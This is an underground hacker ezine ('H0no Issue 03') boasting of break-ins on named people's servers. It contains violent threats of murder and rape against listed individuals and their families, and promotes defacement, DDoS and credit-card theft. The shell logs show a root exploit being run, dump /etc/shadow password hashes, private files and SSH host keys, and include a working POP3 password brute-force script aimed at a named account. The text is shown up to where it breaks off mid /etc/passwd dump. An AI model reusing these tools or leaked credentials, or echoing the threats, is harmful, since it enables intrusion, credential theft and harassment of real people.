Copy Link
Add to Bookmark

H0no Issue 03

eZine's profile picture
Author: eZine
26 Apr 2019


  

#!/bin/rm-rf/yourself
###########################################################
## 0wn & rm 0wn & rm 0wn & rm 0wn & rm 0wn & rm ##
## ,-------------------------------------------------. ##
## >-------------------------------------------------< ##
## | -~- !Support!Zone-H!Support!HackThisSite! ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Deface [secfocus|frsirt|milw0rm] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- DDoS [*@efnet *@freenode] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Steal CC #s [and trade to us] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- Trade xplz [on #darknet] ~-~ | ##
## >-------------------------------------------------< ##
## | -~- !Support!Morning_Wood!Support!Jeremy! ~-~ | ##
## >-------------------------------------------------< ##
## `-------------------------------------------------' ##
## The hardest zine to rool the scene. ##
###########################################################
##:::::::::::::::::::::::::::::0ur:4sc11:4rt1st:1z:d34d::##
##::::: ###:: ###: #########:::::::::s0:fuck:4sc11:::::::##
##::::: ###:: ### ###::: ####:::::::supp0rt:b4nt0wn::::::##
##::::: ###:: ### ###:: #####: ###::::::: #########::::::##
##::::: ######### ###: ## ###: ########: ###:::: ###:::::##
##::::: ###:: ### ### ##: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ### #####:: ###: ###:: ### ###:::: ###:::::##
##::::: ###:: ###: #########:: ###:: ###: #########::::::##
##::::::::::::::::HAPPY:EASTER:IRC:LAMERZ::::::::::::::::##
###########################################################
## b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3-~-b3.4w4r3 ##
###########################################################
## root # ls -al /home/rattle/ ##
## total 32 ##
## drwx--x--x 4 rattle rattle 512 May 28 19:30 . ##
## drwx--x--x 254 root wheel 7168 Jun 15 07:07 .. ##
## -rwx--x--x 1 rattle scream2 771 Mar 13 18:00 .cshrc ##
## -rwx--x--x 1 rattle scream2 1 May 28 19:34 .history##
## drwx--x--x 2 rattle scream2 512 Apr 5 21:59 .irssi ##
## -rwx--x--x 1 rattle scream2 255 Mar 13 18:00 .login ##
## -rwx--x--x 1 rattle scream2 165 Mar 13 18:00 .login_c##
## -rwx--x--x 1 rattle scream2 371 Mar 13 18:00 .mail_al##
## -rwx--x--x 1 rattle scream2 331 Mar 13 18:00 .mailrc ##
## -rwx--x--x 1 rattle scream2 801 Mar 13 18:00 .profile##
## -rwx--x--x 1 rattle scream2 276 Mar 13 18:00 .rhosts ##
## -rwx--x--x 1 rattle scream2 852 Mar 13 18:00 .shrc ##
## drwxr-xr-x 2 rattle rattle 512 May 28 19:30 www/ ##
###########################################################
## echo 'h0no rux' > .sig ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## do yourself a favor and support h0no ##
##-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-##
## scp ~/.sig root@undef.net:/root/ ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## 4R3!Y0U!R34DY!2!B3!H4Q3D???4R3!Y0U!R34DY!2!B3!H4Q3D?? ##
###########################################################
## D0!Y0U!W4NT!2!FUQ!W1TH!US?!D0!Y0U!W4NT!2!FUQ!W1TH!US? ##
###########################################################
## Z0N3-H!H4CKTH1SS1T3!4ND!H0NO!W1LL!D3STR0Y!Y0UR!B0X3Z! ##
###########################################################
## w4s th1nk1ng m4yb3 w3 sh0uld h4v3 4 d1ff3r3nt f0rm4t, ##
## m4yb3 m0r3 r3c1p3s 4nd h0w-t0s 1nst34d 0f unr3l4t3d ##
## 4rt1cl3s thr0wn t0g3th3r? ##
###########################################################
## 2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006-~-2006 ##
###########################################################
## d0nt fuqn f0rg3t GSO! th3 f0rum w1th th3 m0zt h4ck3rz ##
## h4ck3rz th4t h4q! fuq 1r4n up! d3f4c3 4ll 0f th3m! ##
###########################################################
## MSG 10/23/04 at 02:32:56 PM AgntOrng (agntorng@hilary ##
## .duffs.bedroom) www.gmail.com l:radium.shells ##
## p:sha0lin ##
###########################################################
## H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R H4R. ##
## agntorng 1z 0wn3d, 4ll 0f d4rp4 1n ru1nz, n0 0n3 ##
## th3r3 c4n h4q, x0rt suckz, 1z1k suckz, bl4cks3cur1ty ##
## b3tt3r w4tch th31r b4ckz, fuq 4ll y0u fuck1ng h4ck3rz ##
## wh0 d0nt tr4d3 w4r3z w1th uz. w3 g0t DDoZ 4 fr33 ##
###########################################################
## w3 fuq b0x3z up!!w3 fuq b0x3z up!!w3 fuq b0x3z up!! ##
## h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!!-~-h0no3!!! ##
###########################################################

1TZ 2006, Y34R 0F TH3 H0NO H1TL1ZT
~-~-~-~-~-~-~
H0NO H1T L1ST [y0u d0 _n0t_ w4nt t0 b3 0n th1s!]

-~-~- -~-~-~-~-~-~
0wn3d h4ndl3
-~-~- -~-~-~-~-~-~
[x] di0ad
[x] dvdman
[x] tal0n/skew/bandit/luck0elduck
[x] bx
[x] morning_wood
[ ] camel
[ ] agntorng
[ ] anyone from fuqn darpanet/iua who associates with above 2
-~-~-~-~-~-~-~-~-~

p30pl3 0n th1z l1zt n33d 2 f34r.

th3z3 h1t l1zt b1tch3z c4nt h1d3 f0r3v3r. y0u b3tt3r fuck1ng
ch4ng3 y0ur n4m3z 4nd m0v3 t0 4fr1c4.. c4us3 _W3_ _W1LL_
_FUCK_ _Y0UR_ _B0XEZ_ _UP_!_!_!_

~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~

now why would you want to be on thiz list?? you do not want to
be! h0no will fucking tear your life to fucking shreadz. w3 h4v3
3 truckl04dz 0f 0d4yz w1th a b0tn3t th3 s1z3 0f a 1st w0rld
c0untry. w3 h4v3 m1ll10nz 0f CC #'z. w3 w1ll p4y 0ff assassi4nz.
w3 h4v3 m0b c0nn3ct10nz t1ght3r th4n p3ng0. y0u w4nt t0 fuq1ng
d13? y0u w4nt y0ur l1f3 t0 3nd b3c4uz3 0f y0ur d0rky 0nl1n3 1rc
ch4tz? st3p th3 fuck up. m3nt10n h0no, y0u w1ll b3 0wn3d. th1nk
4b0ut d1zz1ng us 4nd y0u w1ll b3 k1ll3d. thr04t sl1t! try t0
1d3nt1fy us 4nd I w1ll F1ND Y0UR F4M1LY 4ND K1LL 3V3RY L4ST 0N3
0F TH3M!@# R4P3 & MURD3R Y0UR M0TH3R. BL00D, PUZZ, & CUM 0ZZ1NG
0UT 0F H3R FUCK1NG CUNT. D0 N0T! D0 N0T! D0 N0T FUCK W1TH H0NO!

~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~

1F 4NY0N3 0F Y0U TH1NK 1TZ 0V3R.. 1T 1Z N0T. Y0UR L1F3Z 4R3
F1N1SH3D! Y0U H4V3 FUCK3D W1TH WR0NG GR0UP 0F CR1M1N4LZ. FUCK1NG
D34D. W3 W4NT Y0U 0FF TH3 1NT3RN3T, W3 W4NT Y0U 0FF TH3 PL4N3T.
W3 _W1LL_ F1ND Y0UR 1NF0, W3 _W1LL_ FUCK1NG CRIPPL3 Y0U. 1T 1Z 4
PR0M1Z3.

~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~

[ARGH!@# I AM S0 M4D I BROK3 MY K3YB0ARD 0V3R MY H34D.]


-1.txt Intr0dukti0n
00.txt -~-~-~ s0rry silent, y0ur 0wn3d
01.txt -~-~-~ konewka roSUCKZ
02.txt -~-~-~ ri0t c0d3z
03.txt -~-~-~ sabre-security
04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1 (esser)
05.txt -~-~-~ tal0n g3tz h4x up!
06.txt -~-~-~ k33p1ng 0d4y s4f3 (th3 v3rs10n phC n3v3r w4nt3d y0u t0 s33!!)
07.txt -~-~-~ g0tfuq3d, g0t0wn3d, g0tn00d4yz4h0not0st34l...
08.txt -~-~-~ N3V3R 0WN3D!! rave. N3V3R 0WN3D!!
09.txt -~-~-~ 3th1cz@exploits.cx
10.txt -~-~-~ ethics@idefense.com
11.txt -~-~-~ 0day iCER r4pz
12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3.
13.txt -~-~-~ 1f b4b0 c4nt h4q th3m..
14.txt -~-~-~ majestic 4x3d.
15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz
16.txt -~-~-~ kf g03z br0k3
17.txt -~-~-~ d4rp4n3t/d1s.0rg fuqt4rd s31z3d
18.txt -~-~-~ h3llm4n c4nt 4dm1n
19.txt -~-~-~ ptp un3th1c4l h4ck1ng
20.txt -~-~-~ how hack in pc
21.txt -~-~-~ di0ad 1z t04zt3d
22.txt -~-~-~ 0wlm4n4tt r3s1gnz
23.txt -~-~-~ nc/rx 0wn3d t0 fuq
24.txt -~-~-~ th3 f41l3d corestorm t34m.
25.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 2 (kunz)
26.txt -~-~-~ 4ud1t1ng th3 h4q3rz m1nd
27.txt -~-~-~ DVDMAN 1Z A FUQN FR34K!!@#
28.txt 0utr0

-1.txt -~-~-~ Intr0dukti0n

h0ly fuck1ng sh1t d1vin31nt! We g0t s0m3 w4r3z. 1tz t1m3 t0
us3 th3m. w3 s3r10uzly c0nc1d3r3d qu1t1ng h4ck1ng, but w1th0ut
us wh0 w0uld rm y0u? wh0 w0uld DoS y0u? wh0 w0uld tr4d3 y0ur
CC #s? Th1ngz 1n d4rkn3t h4v3 cr4wl3d t0 4 gr1nd1ng h4lt. n0
0n3 1s sh4r1ng th31r w4r3z 4nym0r3, s0 w3 h4d t0 m0v3 t0
4lt3rn4t1v3 m34nz t0 g3t th3 0d4y. th4nk g0d f0r b4nt0wn.

w3'v3 h1t th3 j4ckp0t 4nd us3d 4ll 0f 0ur p4yp4l and CC #s t0
purch4s3 s0m3 gr4d3-A w4r3z fr0m A z0ne-h fr13nd 4nd w3 3v3n h4d
th3 w1nn1ng b1d f0r 4n 3xc3l 0d4y unt1l 3b4y turn3d 1nt0 puss1ez.
gu3zz w3 w1ll h4v3 t0 fuzz s0m3m0r3 t0 m4k3th3 y34rly qu0t4.

~-~ di0ad. dvdman. tal0n. bx. morning_wood. camel. agntorng. ~-~
0n 4 t0t4lly d1ff3r3nt subj3ct, tw0 m0r0nz wh0 c4nt c0de
(agntorng & camel - rm 0n s1ght), y3t t4lk m0r3 sh1t th4n 1f
n3td3v & 4ll m3mb3rz 0f b4b0 c0mb1n3d 1nt0 0n3 sup3r
f3c3z-b4b3l-spr4y1ng m4ch1n3, 4r3 runn1ng 4r0und l1k3 s0m3
un3mpl0y3d w1r3d.c0m 3d1t0rz st4rt1ng sh1t 4ll 0v3r th3 pl4c3.
th3y kn0w w3 g0t th31r 1nf0z, th3y kn0w w3 g0t th3 w4r3z,
th3y kn0w th3y 4r3 d3f3ns3l3zz. th3n why w0uld 4ny0n3 w4nt t0
st3p up t0 us??

fuck w1th h0no 4nd y0u w1ll g3t d3lt w1th.

1t 1s pr0b4bly b3tt3r f0r y0ur b0x 1f y0u d0nt 3v3n r34d th1s z1n3.


00.txt -~-~-~ s0rry silent, y0ur 0wn3d

ircd@box187 ~ $ cat sn1ffl0g | grep \|silent
:d4rkgr3y!~phear@217.107.223.43 PRIVMSG FoxTrot- : |silent is m00 member

y0u truzt y0ur m3mb3rz d4rkgr3y? l3tz s33..

--------------------------------------------------------------------------------


18:53 <|silent> btw! there is a group outta there who own boxes from
security-team-ppl
18:53 <|silent> 2 m00 ppl already got owned and one teso guy got owned
18:53 <|silent> i know all the 3 ppl!
18:54 <|silent> i'm a bit scared they seem to be good i just hope they wont take
my server :/
18:54 <|silent> check http://h0h0.com/h0no.txt
18:54 <|silent> search for silent in the document
18:55 <cellular> heh, nice :P
18:55 <cellular> they wont manage it :P
18:55 <cellular> ill read it, i just fix the mail stuff first
18:57 <|silent> okay :)
19:00 <cellular> seems to work ;)
19:00 <|silent> :D
19:01 <cellular> hmmm
19:01 <cellular> which box is that ?
19:01 <cellular> drwx------ 2 rob rob 512 Sep 19 19:06 rob
19:01 <cellular> drwx------ 2 silent silent 512 Sep 20 06:16 silent
19:02 <|silent> it was the box from a m00 teammate
19:02 <cellular> ok :P
19:02 <|silent> from a fucking good security guy also! so i'm a bit scared ;/
19:03 <|silent> http://reflux.dyndns.org/
19:03 <cellular> lol, they write like fucking script-kiddies :P
19:03 <cellular> ok
19:03 <|silent> lol
19:03 <cellular> if they manage to get your root password it is no problem to
root it
19:03 <cellular> else it's HARD
19:03 <cellular> i don't think they will manage to do so
19:04 <cellular> since you use random return addresses
19:04 <cellular> most exploits require a pre-defined return address to occour to
work
19:04 <|silent> yea but.. they don't use bruteforce shit.. as the hono file
say ;/
19:04 <cellular> atleast overflow exploits
19:04 <|silent> they use useraccounts and gain root with it

20:20 <silentoo> but remember i'll add m00 and priv8 ppl
20:20 <cellular> then we'll degrade
20:20 <cellular> grrr
20:20 <cellular> fuck :P
20:20 <silentoo> hahaha :D
20:20 <silentoo> i add all the coder :D
20:20 <cellular> hahaha :P
20:20 <silentoo> so we can take their sources and advisories :D
20:20 <cellular> you've talked to them ?
20:20 <silentoo> yep
20:20 <cellular> yep :P
20:21 <silentoo> i announced in m00 members page that i'll got a server for the
coders :)
20:21 <cellular> then we root fbi.gov
20:21 <silentoo> hahaha
20:21 <silentoo> not from my server :D
20:21 <cellular> i will :P
20:21 <silentoo> but we have to think about something which copy all new
downloaded files to a special folder ;D
20:22 <silentoo> so that we can get it later :p
20:22 <silentoo> and we have to manipulate w and who so that ppl just see their
own processes
20:22 <silentoo> ehrm
20:22 <silentoo> own connections

--------------------------------------------------------------------------------


-~-~-~QOUTE-~-~-~ "so i'm a bit scared" - |silent -~-~-~QOUTE-~-~-~


digitaljunk:~$ uname -a; id
Linux digitaljunk 2.6.11.9-grsec-digitaljunk #2 Tue May 31 19:42:12 CEST 2005 i686 GNU/Linux
uid=1000(silent) gid=100(users) Gruppen=100(users)
digitaljunk:~$ cd Maildir/new/
digitaljunk:~/Maildir/new$ cat 1117650803.V302I40e229M467122.localhost.localdomain
Return-Path: <mailinglists@frsirt.com>
X-Original-To: silent@oral-sex.bz
Delivered-To: silent@oral-sex.bz
Received: from ns30617.ovh.net (ns30617.ovh.net [213.186.47.153])
by mail.digitaljunk.de (Postfix) with SMTP id 508F11AF2EE
for <silent@oral-sex.bz>; Wed, 1 Jun 2005 20:33:23 +0200 (CEST)
Received: (qmail 24578 invoked by uid 99); 31 May 2005 09:32:46 -0000
Date: 31 May 2005 09:32:46 -0000
Message-ID: <20050531093246.7663.qmail@ns30617.ovh.net>
To: silent@oral-sex.bz
Subject: [Exploits] Microsoft Windows Exploit (MS05-012), Zeroboard 4.x "preg_replace" Exploit
From: FrSIRT Alerts <mailinglists@frsirt.com>
X-Sender: <mailinglists@frsirt.com>
Mime-Version: 1.0
charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

----------------------------------------------------------------------
FrSIRT / Exploits and Codes
----------------------------------------------------------------------
The French Security Incident Response Team 24/24 & 7/7
----------------------------------------------------------------------
- 31 May 2005 -
----------------------------------------------------------------------

- Microsoft Windows COM Structured Storage Local Exploit (MS05-012)

http://www.frsirt.com/exploits/20050531.SSExploit.c.php


- Zeroboard 4.x "preg_replace" Remote Command Execution Exploit

http://www.frsirt.com/exploits/20050531.zeroboard.c.php

----------------------------------------------------------------------
Copyright © 2002-2005 - FrSIRT.COM
----------------------------------------------------------------------


#################################################################
## y0u w1ll n33d m0re th4n 0ld w4r3z t0 b3 s4f3! ##
#################################################################


digitaljunk:~/Maildir/new$ cd
digitaljunk:~$ cd coding/
digitaljunk:~/coding$ ls *
cokebot:
bf_tab.h blowfish.c blowfish.h cocain cokebot.c Makefile

dev-files:
blowfish-dev mysql-dev

done:
kaiten.c keyloger.c libirc.tar.gz uingen.c

php:
bleattern.php getfiletime.php nospam.php random_pass.php upload.php
urlvalid.php validate_mail.php

samples:
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c
digitaljunk:~/coding$ head -n54 cokebot/cokebot.c
/*
****** PRIVATE EDITION ******
* *
* cokebot v.0.5 beta *
* © 2004 by |silent *
* *
*****************************

Changelog: 08.11.2004
+ added reconnect feature!

Changelog: 03.11.2004
+ added part command
+ added restart command (beta! too lazy to fork() ;D will do it soon!)

Changelog: 02.11.2004
+ added static login (eh? missing part cmd see TODO)
+ added chanlist (beta! chan/chankey support done!)
+ added userlist support
+ replaced join/op/deop/die/whoami commands for user-support
+ added userlist with authlevel
+ added support for older gcc

Changelog: 01.11.2004
+ rewrote command system
+ radnom nick/user/ident
+ updated conn()
+ added nick system (completation etc..)
+ blowfish cryption (beta)
+ segfault on quit fixed
+ fixed segfault on non-existing sites.conf

Changelog: 31.10.2004
+ radnom nick/user/ident
+ replaced sendtotarget()
+ static server/port
+ added commandlist by char

TODO:
- use linked lists for chans
- restart fork()
- better blowfish implementation
- doconf() to create conf-files if non exist
- crypted userlist
- crypted chanlist
- add modes etc.. to chanlist
- sitemanager
- admin control to modify chans/user
- useradd
- evilmode
- hidden process
- shellcommands

*/

digitaljunk:~/coding$ head -n5 done/keyloger.c
/*

Simple Keyloger - by |silent

*/

digitaljunk:~/coding$ head -n22 done/uingen.c
#include <stdio.h>
#include <stdlib.h>

void welcome() {
printf("[-] UINGen by |silent\n");
printf("[-] (c) 2004 |silent\n");
printf("[-] Contact: silent@oral-sex.bz\n");
printf("[-] Website: http://blackhat.tv\n");
}

void usage() {
printf("[-] Usage: ./uingen -f <first-uin> -l <last-uin> [-po]\n");
printf("[-] Scan-Example: ./uingen -f 500000 -l 550000 -p test123 -o uinlist.txt\n");
printf("[-] Single-UIN Example: ./uingen -s 123123123 -w word.lst -o brutelist.txt\n");
printf("[-] -f First UIN\n");
printf("[-] -l Last UIN\n");
printf("[-] -s Single UIN/Wordlist Mode [-w required]\n");
printf("[-] -w Wordlist [for single UIN mode only]\n");
printf("[-] -p Password [default: password]\n");
printf("[-] -o Outfile [default: outfile.txt]\n");
exit(1);
}
digitaljunk:~/coding$ ls samples/
fopen.c itoa.c readdir.c socket-client.c socket-server.c unlink.c


#################################################################
## ~-~Wh3r3 4r3 th0s3 c0d3z......?? ##
#################################################################


digitaljunk:~$ cd htdocs/
digitaljunk:~/htdocs$ ls
213.239.211.98 digitaljunk.de greyhat.co.uk oral-sex.bz
digitaljunk:~/htdocs$ ls digitaljunk.de/content/vidz
afterhour-part1.avi
silent_owned.wmv
digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/exploits/

#################################################################
## ~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~B1NG0!~-~ ##
#################################################################

digitaljunk:~/htdocs$ ls digitaljunk.de/content/coding/sources/
agobot3-0.2.1-pre4-priv.rar
blow
BlowSXT.rar
connectback.pl
hookbot.tgz
kaiten.c
libirc.tar.gz
mysql
pftp-src.0.11.4.tgz
shijack.c
sock.c
uingen.c
digitaljunk:~/htdocs$ cd
digitaljunk:~$ ./h00p1tup
digitaljunk:/home/silent# id
uid=0(root) gid=0(root) Gruppen=0(root)
digitaljunk:/home/silent# cd
digitaljunk:~# ls
allsql.sql
candicrew_home.tgz
cyrus-imapd-2.2.12.tar.gz
db-4.3.28
ebba_home.tgz
oidentd-2.0.7
pam_mysql-0.5.tar.gz
procmail-3.22
video.asp?video=V8-Chainsaw
awstats-6.5.tar.gz
cybersoft_inkasso_home.tgz
cyrus-sasl-2.1.21
db-4.3.28.tar.gz
install-report.template
oidentd-2.0.7.tar.gz
postfix-2.1.6
procmail-3.22.tar.gz
waterguide_home.tgz
awstats-6.5.tar.gz.1
cyrus-imapd-2.2.12
cyrus-sasl-2.1.21.tar.gz
dbootstrap_settings
Mail
pam_mysql
postfix-2.1.6.tar.gz
vhosts.conf.backup
webmin-1.200.tar.gz
digitaljunk:~# cat /etc/shadow
root:$1$T6gE9w0/$vo/dIs7jK7CP2lr.aRtMx/:12934:0:99999:7:::
daemon:*:12893:0:99999:7:::
bin:*:12893:0:99999:7:::
sys:*:12893:0:99999:7:::
sync:*:12893:0:99999:7:::
games:*:12893:0:99999:7:::
man:*:12893:0:99999:7:::
lp:*:12893:0:99999:7:::
mail:*:12893:0:99999:7:::
news:*:12893:0:99999:7:::
uucp:*:12893:0:99999:7:::
proxy:*:12893:0:99999:7:::
www-data:*:12893:0:99999:7:::
backup:*:12893:0:99999:7:::
list:*:12893:0:99999:7:::
irc:*:12893:0:99999:7:::
gnats:*:12893:0:99999:7:::
nobody:*:12893:0:99999:7:::
Debian-exim:!:12893:0:99999:7:::
sshd:!:12893:0:99999:7:::
mysql:!:12893:0:99999:7:::
silent:$1$72YyIyox$67vyj7jfLUWeFYA24dWOl1:12934:0:99999:7:::
breath:!:12934:0:99999:7:::
upload:$1$gVq9vOrJ$qrQgeXNVHjX.FFi4xhK9K/:12934:0:99999:7:::
hillside:$1$gfXquKfq$mWkMvMvKY3sck.PJstZqp0:12934:0:99999:7:::
bind:!:12934:0:99999:7:::
tuborg:$1$lhO4VKnt$yx9/34El7HK5m5KS5jUFe/:12934:0:99999:7:::
cyrus:$1$mk7JsS6t$/lGzf9WhyOT9ZdotH.ajN.:12934:0:99999:7:::
postfix:!:12934:0:99999:7:::
dovecot:!:12935:0:99999:7:::
tech:$1$SYf8xzC/$enjJt2k9hqxdxiUogdD3D/:12935:0:99999:7:::
marius:$1$mtWc/oSj$czow9rYQcy3EPrtRfTQHX0:12935:0:99999:7:::
jonas:$1$i9wTlJ7r$4TbucpQL.uG6RmDgkq9uP.:12936:0:99999:7:::
bjerkis:$1$Z8TcITtK$KvOghtp2AYJCQLogkHovh1:12936:0:99999:7:::


#################################################################
# QOUTE ~-~ "18:55 <cellular> they wont manage it :P" ~-~ QOUTE #
#################################################################

Th4nkz t0 |s1l3nt f0r st34l1ng pr1v4t3 c0d3z fr0m h1z t34m-m4t3z
(m00 & priv8sec) & f0r l3tt1ng us t4k3 1t s0o0o e4s1ly! w4tch f0r
silent_owned2.wmv t0 dr0p.


Whois silent?
08:34 -!- |silent [silent@divinity-38478E7B.de]
08:34 -!- ircname : h0no I've been owned!
08:34 -!- channels : @#darpa @#m00 @#teengaysex
08:34 -!- server : irc.blackhat.ru [m00 IRCd]
08:34 -!- : is a Secure Connection
08:34 -!- idle : 0 days 2 hours 15 mins 34 secs
08:34 -!- End of WHOIS


01.txt -~-~-~ konewka roSUCKZ

konewka fr0m roSEC g3tz 4x3d, m4yb3 h3 sh0uld sp3nd m0r3 t1m3 th1nk1ng up a
b3tt3r p4zzw0rd r4th3r th4n tr4d1ng cr3d1t c4rdz 4nd sh1tty s0urc3. 1t 0nly
t00k hydr4 a 200kb d1c t0 cr4q h1z p4zz. h1z c0d3z 4r3 m0r3 p01ntl3zz th4n
a hwa-security r3l34z3.


login as: konewka
konewka@83.23.44.188's password:
Last login: Wed Sep 20 23:10:59 2005 from h.0.n.o
+ Welcome aboard +

konewka@olek:~$ uname -a;id
Linux olek 2.4.30-ow3 #1 Tue Sep 13 18:45:51 CEST 2005 i686 unknown
uid=1000(konewka) gid=100(users) groups=100(users),10(wheel)
konewka@olek:~$ ls -al
total 3772
drwx-----x 14 konewka users 4096 Sep 17 18:03 .
drwxr-xr-x 5 konewka users 4096 May 24 15:28 ..
-rw------- 1 konewka users 6173 Sep 20 16:20 .bash_history
drwx------ 3 konewka users 4096 Sep 4 12:34 .gg/
drwx------ 3 konewka users 4096 Oct 29 2004 .irssi/
drwxr-xr-x 3 konewka users 4096 Sep 14 14:39 .mc/
drwx------ 2 konewka users 4096 Aug 22 15:59 .screen/
-rw-r--r-- 1 konewka users 3394 May 5 2004 .screenrc
drwx------ 2 konewka users 4096 May 30 2004 .ssh
drwx------ 4 konewka users 4096 Apr 10 15:07 b0x/
-rw-r--r-- 1 konewka users 205 Aug 13 22:10 clear_dict.pl
-rwxr-xr-x 1 konewka users 12224 Aug 8 22:13 mcrack
drwxr-xr-x 10 konewka users 4096 Mar 16 2005 meggdrop
drwxr-xr-x 2 konewka users 4096 Aug 9 22:28 mgg_hijack
drwxr-xr-x 2 konewka users 4096 May 23 2004 mlamebot
-rwxr-xr-x 1 konewka users 621 Aug 13 01:54 mmcrack.pl
drwxr-xr-x 2 konewka users 4096 Aug 10 2004 n0f
-rw-r--r-- 1 konewka users 571856 Aug 12 19:35 mperl5.zip
-rw-r--r-- 1 konewka users 2154218 Aug 13 01:56 polish
-rw-r--r-- 1 konewka users 1022183 Aug 13 22:09 polish.clear
-rwxr-xr-x 1 konewka users 1498 Jan 8 2005 relay.pl
drwxr-xr-x 2 konewka users 4096 Aug 11 20:02 smb_h03
-rw-r--r-- 1 konewka users 21 Jul 22 22:07 temporary
drwxr-xr-x 2 konewka users 4096 Aug 3 21:57 w0rkz
konewka@olek:~$ head -n4 relay.pl
#!/usr/bin/perl -w
# relay.pl C-class smtp relay scanner by konewka <konewka@localdomain.ru>
# use ./relay.pl 2> relay_servers to log only smtps with relaying.
# This is edu purpose only. enjoy
konewka@olek:~$ cat mcrack.pl
#!/usr/bin/perl -w
use Net::POP3;

# setup
my $host = "poczta.onet.pl";
my $user = "malgosia181";
my $dict = "polish";

print "mrack.pl by konewka\n";

open(WORDLIST, $dict);
$pass = <WORDLIST>;
$| = 1;

while ($pass ne "") {
$pop3 = Net::POP3->new($host); die "Can't connect !" unless $pop3;
$pass = substr($pass, 0, length($pass)-1);
$cracked = $pop3->login($user, $pass);
if (defined($cracked)) {
print "\nCracked ! Password = ".$pass."\n";
$pop3->quit();
close(WORDLIST);
exit 1337;
}
else {
print ".";
}
$pass = <WORDLIST>;
}

printf "I guess nothing was cracked this time.\n";
konewka@olek:~$ cd .ssh
konewka@olek:~/.ssh$ cat known_hosts
192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtZ8HOFBxujq/T3Mnnv2uGAdSdu6eERdVMiUlwJzmwuyzPgAn/taXzPfMgCLM9QfEBzuc1K20+h1jn0MPPGavQfmuBcShz+zPSUA3IAbqjyUvHtO+J3ODDweDl2wy3qGefrBAhlTSQTphjb/cKRO3PLztHd2qM14xB1svC8WU81c=
rosec.segfaulted.com,80.97.66.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0hwGICbJvrIfgezT5j4RtAF1cW0sWmRxr5Ym21pHg4Bn7ujHXdogSQJenI6GeJ4q2FI4mfVVui+Ce7VKKZs3YYeR/lIvbJh5p6cjjmw2oJyIMjp3dsRd3QZnM1IrDt9tZCVyHWALwT2GyH7sFwS5YiqQczBvPUcssEx1+//z3r0=
ffs.ath.cx,82.224.195.151 ssh-dss AAAAB3NzaC1kc3MAAAEBAKj6I/LFVpofk3d9f65Cr/CjViVBA64+aaIfSk2h0Shz09TT4SdSLpDh6uMh2UX+SX/4pMq3ke2tmUzY7NYt6ZhOge7sOgsIF0S/bRFyGO25Ow58AWPDTk4Z/B93wSc31gE+oiLi9fIrt0JJwTEbswQgmMjnGjiV9QB0OB1XbevgfTBtsxc+DtbuXAWsA9/JWthIXf3UlgHj20hRpTgp4q6r00bD0efmSbyqWq0U+rTKHS8dFAnLiRrvfkLzkToDjdffr/MFj9gJI+Z04Aki25KzgFW4i2imep5foq08/9zanOQ/OMSfW6tdEXGBLUXJQhEOUUUGHvXuPaTnGHOktbsAAAAVAKLGZ4KLasiL6g8XJ0msw56RckzZAAABAEBsfr3TR7l1Ld7PWc7+o/02rE+INHk/hTomKc6tizNo0bF7W1IvjnmX6q17Tj8M1rV6/I1QpYMcfCNC7UZhoMmq//8lum02v+k1LXNjbV+R85V9hYkPYfqzEHpER4hwo/aqelzV9/gVLRxYurRdKg2DqOHEwV/BlKpk/hL0NYsA3RHPdomsQmqBtAYiPeDGUkI3l7lTLO+Vnvhp00Re4KcNzrYsWp3aCF+JcqJ5w8VPJEgoWQI76p7PW5Croaaiebh3d7Mn92wCSaaL0+W3JxY0ZFijJPSFEQQYjrLfASC+a3yi/em8MeAaBc4OrC+Lod7SQHz2AfsdRwAtEYwIfPcAAAEBAIJVSztDyUD8BHUfSfN1yV1vVDcMYY98wpDmluDRO1PEGnGB81y/HJKATKU8VXd7xxJFlhQL92HVohu5Fcz3WiPtZGNw2bcZJ0+s+1ormLgmgcBeWIIG79anXi+JBUugjaf1fzviRmcwChRLU6ameKFWDv4GNW3u4XQEQheN4XbLKhIFT774cFtadTFB4qRTxyh/qOyw6eeW6RzjCaHydVgTY8PzffU13yyoKwsb8MZz9W3G3cicsbZCUKcSPs5OZ8Z9kp4uz4lwAWcoaz8zVlAjxLy62PObmb40qSaLfHUKvvxNs5EQEqirr/wtxpdpPDaiYDaggYECgwYJ6k/11/k=
konewka@olek:~/.ssh$ cd ..
konewka@olek:~$ cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucppublic:
